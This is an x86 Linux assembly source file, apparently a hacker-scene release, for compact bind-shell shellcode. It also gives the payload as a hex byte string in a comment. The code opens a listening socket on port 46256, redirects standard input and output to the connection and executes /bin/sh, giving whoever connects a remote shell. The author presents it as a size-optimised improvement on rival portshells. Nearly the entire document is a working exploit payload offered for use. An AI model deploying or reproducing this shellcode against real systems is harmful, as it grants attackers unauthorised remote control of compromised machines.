# ANTI-prym/h4g1s portshell code by jsbach =)
# email: jsb4ch@hotmail.com
# bind a shell to port 46256 (0xb4b0 =))
# this code is much more optimized than previous portshells!
# it is only 135 bytes (ADM's portshell shellcode is 238 bytes,
# prym's is 179)
# code is obfuscated because we need to use short instructions for
# small shellcode.


# char *portshell =
# "\x55\x89\xe5\xb2\x66\x89\xd0\x31\xc9"
# "\x89\xcb\x43\x89\x5d\xf8\x43\x89\x5d\xf4\x4b\x89"
# "\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89\x45\xf4"
# "\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\xb4\xb0\x89"
# "\x4d\xf0\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10"
# "\x89\xd0\x8d\x4d\xf4\xcd\x80\x89\xd0\x43\x43\xcd"
# "\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9\xb2\x3f"
# "\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41"
# "\xcd\x80\xc7\x45\xe8\x2f\x62\x69\x6e\x66\xc7\x45"
# "\xec\x2f\x73\xc6\x45\xee\x68\x31\xc9\x88\x4d\xef"
# "\xb0\x0b\x8d\x5d\xe8\x89\x5d\xe0\x8d\x4d\xe0\x31"
# "\xd2\x89\x55\xe4\xcd\x80";


.globl main
.type    main,@function
main:
pushl %ebp
movl %esp, %ebp
movb $102, %edx /* only do a move from a literal once, (5 bytes ugh) */
movl %edx, %eax /* socketcall */
xorl %ecx, %ecx /* ecx is our zero register. */
movl %ecx, %ebx
/* this looks messy but leads to much smaller code */
incl %ebx /* indicates socket(), used to demultiplex socketcall */
movl %ebx, -8(%ebp)
incl %ebx /* dont make me explain ;) */
movl %ebx, -12(%ebp)
decl %ebx /* decl it for the socketcall :( */
movl %ecx, -4(%ebp) /* anti-NULL */
leal -12(%ebp), %ecx
int $0x80 /* socket(AF_INET, SOCK_STREAM, 0); */
 /* ok now sockfd is at appropriate place for subsequent socketcalls */
xorl %ecx, %ecx
movl %eax, -12(%ebp) /* save the sockfd on the stack..*/
 /* ebx == 2 */
incl %ebx
movw %ebx, -20(%ebp) /* sockaddr family = AF_INET */
movw $45236, -18(%ebp) /* sockaddr port = htons(0xb4b0) */
movl %ecx, -16(%ebp) /* addr = INADDR_ANY */
/* put the addr of the sockaddr_in struct in eax, then put eax  */
/*  in the proper place for the socketcall *argp */
leal -20(%ebp), %eax
movl %eax, -8(%ebp) /* -8 is the second arg */
/* put the length of sockaddr in the right place */
movb $16, -4(%ebp)
/* prepare for socketcall finally :) ebx == 1*/
movl %edx, %eax /* socketcall */
leal -12(%ebp), %ecx
int $0x80
/* ok time to listen(2). our sockfd is already at -12(%ebp) */
movl %edx, %eax /* socketcall heh */
 /* two incl's are 2 bytes, 1 addl is 3 bytes. */
incl %ebx
incl %ebx
int $0x80 /* just go with whatever length is at -12(%ebp) ;) */
/* ok time for accept(2) */
/* our old sockaddr is still at -8(%ebp) */
 /* $16 is still at -4(%ebp), dont replace it */
/* ok now do the syscall bitch! */
movl %edx, %eax
incl %ebx
/* -12(%ebp) is already in %ecx */
int $0x80
movl %eax, %ebx /* save our new socket descriptor where it will be used*/
                /* as an arg for dup2() */
#fork commented out.. no need.
#movl $2, %eax
#int $0x80
#cmpl %edx, %eax
#jnz end
/* ok, time for dup2() (so all i/o from shell/to shell will be copied to */
/* the socket) */
xorl %ecx, %ecx
 /* so we have only one move from a literal */
movb $63, %edx
movl %edx, %eax
int $0x80
movl %edx, %eax
incl %ecx /* ++ecx == 1 */
int $0x80
movl %edx, %eax
incl %ecx
int $0x80
 /* load the string /bin/sh onto the stack here */
movl $0x6e69622f, -24(%ebp)
movw $0x732f, -20(%ebp)
movb $0x68, -18(%ebp)
xorl %ecx, %ecx
movb %ecx, -17(%ebp)
movb $11, %eax
leal -24(%ebp), %ebx
/* argv[0] = "/bin/sh" */
movl %ebx, -32(%ebp)
movl %ecx, -28(%ebp) /* add a null to the end of **argv */
leal -32(%ebp), %ecx
int $0x80